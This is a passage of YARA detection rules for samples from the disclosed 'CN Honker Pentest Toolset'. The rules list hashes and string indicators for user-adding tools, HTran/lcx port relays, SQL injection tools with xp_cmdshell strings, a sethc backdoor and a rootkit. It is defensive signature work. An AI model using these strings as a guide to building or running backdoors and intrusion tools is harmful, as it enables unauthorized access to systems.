strings:
|
||
|
$s1 = "File UserName PassWord [comment] /add" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "No Net.exe Add User" fullword ascii
|
||
|
$s3 = "BlackMoon RunTime Error:" fullword ascii
|
||
|
$s4 = "Team.F4ck.Net" fullword wide
|
||
|
$s5 = "admin 123456789" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s6 = "blackmoon" fullword ascii
|
||
|
$s7 = "f4ck Team" fullword wide
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 100KB and 4 of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_F4ck_Team_F4ck_3 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file F4ck_3.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "0b3e9381930f02e170e484f12233bbeb556f3731"
|
||
|
id = "1767669f-47d0-5d6e-97a5-92522f988102"
|
||
|
strings:
|
||
|
$s1 = "F4ck.exe" fullword wide
|
||
|
$s2 = "@Netapi32.dll" fullword ascii
|
||
|
$s3 = "Team.F4ck.Net" fullword wide
|
||
|
$s6 = "NO Net Add User" fullword wide
|
||
|
$s7 = "DLL ERROR" fullword ascii
|
||
|
$s11 = "F4ck Team" fullword wide
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 100KB and 3 of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_ACCESS_brute {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file ACCESS_brute.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "f552e05facbeb21cb12f23c34bb1881c43e24c34"
|
||
|
id = "7ceaea93-4f23-50a3-ab39-8149b10ffdad"
|
||
|
strings:
|
||
|
$s1 = ".dns166.co" ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "SExecuteA" ascii /* PEStudio Blacklist: strings */
|
||
|
$s3 = "ality/clsCom" ascii
|
||
|
$s4 = "NT_SINK_AddRef" ascii
|
||
|
$s5 = "WINDOWS\\Syswm" ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 20KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_Fpipe_FPipe {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file FPipe.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 50
|
||
|
hash = "a2c51c6fa93a3dfa14aaf31fb1c48a3a66a32d11"
|
||
|
id = "0d84aa8f-dc15-5bb7-a568-224c6a837685"
|
||
|
strings:
|
||
|
$s1 = "Unable to create TCP listen socket. %s%d" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "http://www.foundstone.com" fullword ascii
|
||
|
$s3 = "%s %s port %d. Address is already in use" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 20KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_Layer_Layer {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file Layer.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
modified = "2022-12-21"
|
||
|
score = 70
|
||
|
hash = "0f4f27e842787cb854bd61f9aca86a63f653eb41"
|
||
|
id = "48e27119-da7e-5921-8d4f-f8a1e3ac0439"
|
||
|
strings:
|
||
|
$s1 = "\\Release\\Layer.pdb" ascii
|
||
|
$s2 = "Layer.exe" fullword wide
|
||
|
$s3 = "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0" fullword wide /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 300KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_ms10048_x86 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file ms10048-x86.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "e57b453966e4827e2effa4e153f2923e7d058702"
|
||
|
id = "5d572d35-d2e5-5457-89d9-fbce8f8fa552"
|
||
|
strings:
|
||
|
$s1 = "[+] Set to %d exploit half succeeded" fullword ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 30KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_HTran2_4 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file HTran2.4.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "524f986692f55620013ab5a06bf942382e64d38a"
|
||
|
id = "21cb5ec5-900d-5092-8c2b-2d951289957c"
|
||
|
strings:
|
||
|
$s1 = "Enter Your Socks Type No: [0.BindPort 1.ConnectBack 2.Listen]:" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "[+] New connection %s:%d !!" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 180KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_SkinHRootkit_SkinH {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file SkinH.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "d593f03ae06e54b653c7850c872c0eed459b301f"
|
||
|
id = "8aedd01c-9dc8-537d-97ea-bc8de81edd3d"
|
||
|
strings:
|
||
|
$s0 = "(C)360.cn Inc.All Rights Reserved." fullword wide
|
||
|
$s1 = "SDVersion.dll" fullword wide
|
||
|
$s2 = "skinh.dll" fullword ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 2000KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker__PostgreSQL_mysql_injectV1_1_Creak_Oracle_SQLServer_inject_Creaked {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
super_rule = 1
|
||
|
hash0 = "1ecfaa91aae579cfccb8b7a8607176c82ec726f4"
|
||
|
hash1 = "a1f066789f48a76023598c5777752c15f91b76b0"
|
||
|
hash2 = "0264f4efdba09eaf1e681220ba96de8498ab3580"
|
||
|
hash3 = "af3c41756ec8768483a4cf59b2e639994426e2c2"
|
||
|
id = "0272776c-8dbe-5345-92c8-57593686a84c"
|
||
|
strings:
|
||
|
$s1 = "zhaoxypass@yahoo.com.cn" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "Mozilla/3.0 (compatible; Indy Library)" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s3 = "ProxyParams.ProxyPort" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker__wwwscan_wwwscan_wwwscan_gui {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - from files wwwscan.exe, wwwscan.exe, wwwscan_gui.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
super_rule = 1
|
||
|
hash0 = "6dbffa916d0f0be2d34c8415592b9aba690634c7"
|
||
|
hash1 = "6bed45629c5e54986f2d27cbfc53464108911026"
|
||
|
hash2 = "897b66a34c58621190cb88e9b2a2a90bf9b71a53"
|
||
|
id = "02f80151-4dfb-5b14-9145-312a9bd2c609"
|
||
|
strings:
|
||
|
$s1 = "GET /nothisexistpage.html HTTP/1.1" fullword ascii
|
||
|
$s2 = "<Usage>: %s <HostName|Ip> [Options]" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 200KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker__LPK_LPK_LPK {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - from files LPK.DAT, LPK.DAT, LPK.DAT"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
super_rule = 1
|
||
|
hash0 = "5a1226e73daba516c889328f295e728f07fdf1c3"
|
||
|
hash1 = "2b2ab50753006f62965bba83460e3960ca7e1926"
|
||
|
hash2 = "cf2549bbbbdb7aaf232d9783873667e35c8d96c1"
|
||
|
id = "e1beb88b-d3e8-5868-affb-e59c26e4dc2e"
|
||
|
strings:
|
||
|
$s1 = "C:\\WINDOWS\\system32\\cmd.exe" fullword wide /* PEStudio Blacklist: strings */
|
||
|
$s2 = "Password error!" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s3 = "\\sathc.exe" ascii
|
||
|
$s4 = "\\sothc.exe" ascii
|
||
|
$s5 = "\\lpksethc.bat" ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 1057KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker__builder_shift_SkinH {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - from files builder.exe, shift.exe, SkinH.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
super_rule = 1
|
||
|
hash0 = "6b5a84cdc3d27c435d49de3f68872d015a5aadfc"
|
||
|
hash1 = "ee127c1ea1e3b5bf3d2f8754fabf9d1101ed0ee0"
|
||
|
hash2 = "d593f03ae06e54b653c7850c872c0eed459b301f"
|
||
|
id = "cb18aa4a-6eba-58ca-a6fc-e4160b90f4d7"
|
||
|
strings:
|
||
|
$s1 = "lipboard" fullword ascii
|
||
|
$s2 = "uxthem" fullword ascii
|
||
|
$s3 = "ENIGMA" fullword ascii
|
||
|
$s4 = "UtilW0ndow" fullword ascii
|
||
|
$s5 = "prog3am" fullword ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 6075KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker__lcx_HTran2_4_htran20 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - from files lcx.exe, HTran2.4.exe, htran20.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
super_rule = 1
|
||
|
hash0 = "0c8779849d53d0772bbaa1cedeca150c543ebf38"
|
||
|
hash1 = "524f986692f55620013ab5a06bf942382e64d38a"
|
||
|
hash2 = "b992bf5b04d362ed3757e90e57bc5d6b2a04e65c"
|
||
|
id = "c6851e7b-ab64-5578-896e-4d92fb3b2000"
|
||
|
strings:
|
||
|
$s1 = "[SERVER]connection to %s:%d error" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "[+] OK! I Closed The Two Socket." fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s3 = "[+] Start Transmit (%s:%d <-> %s:%d) ......" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 440KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker__D_injection_V2_32_D_injection_V2_32_D_injection_V2_32 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - from files D_injection_V2.32.exe, D_injection_V2.32.exe, D_injection_V2.32.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
super_rule = 1
|
||
|
hash0 = "3a000b976c79585f62f40f7999ef9bdd326a9513"
|
||
|
hash1 = "3a000b976c79585f62f40f7999ef9bdd326a9513"
|
||
|
hash2 = "3a000b976c79585f62f40f7999ef9bdd326a9513"
|
||
|
id = "79e9cd97-c070-5109-a0a0-bc88eea0dc37"
|
||
|
strings:
|
||
|
$s1 = "upfile.asp " fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "[wscript.shell]" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s3 = "XP_CMDSHELL" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s4 = "[XP_CMDSHELL]" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s5 = "http://d99net.3322.org" fullword ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 10000KB and 4 of them
|
||
|
}
|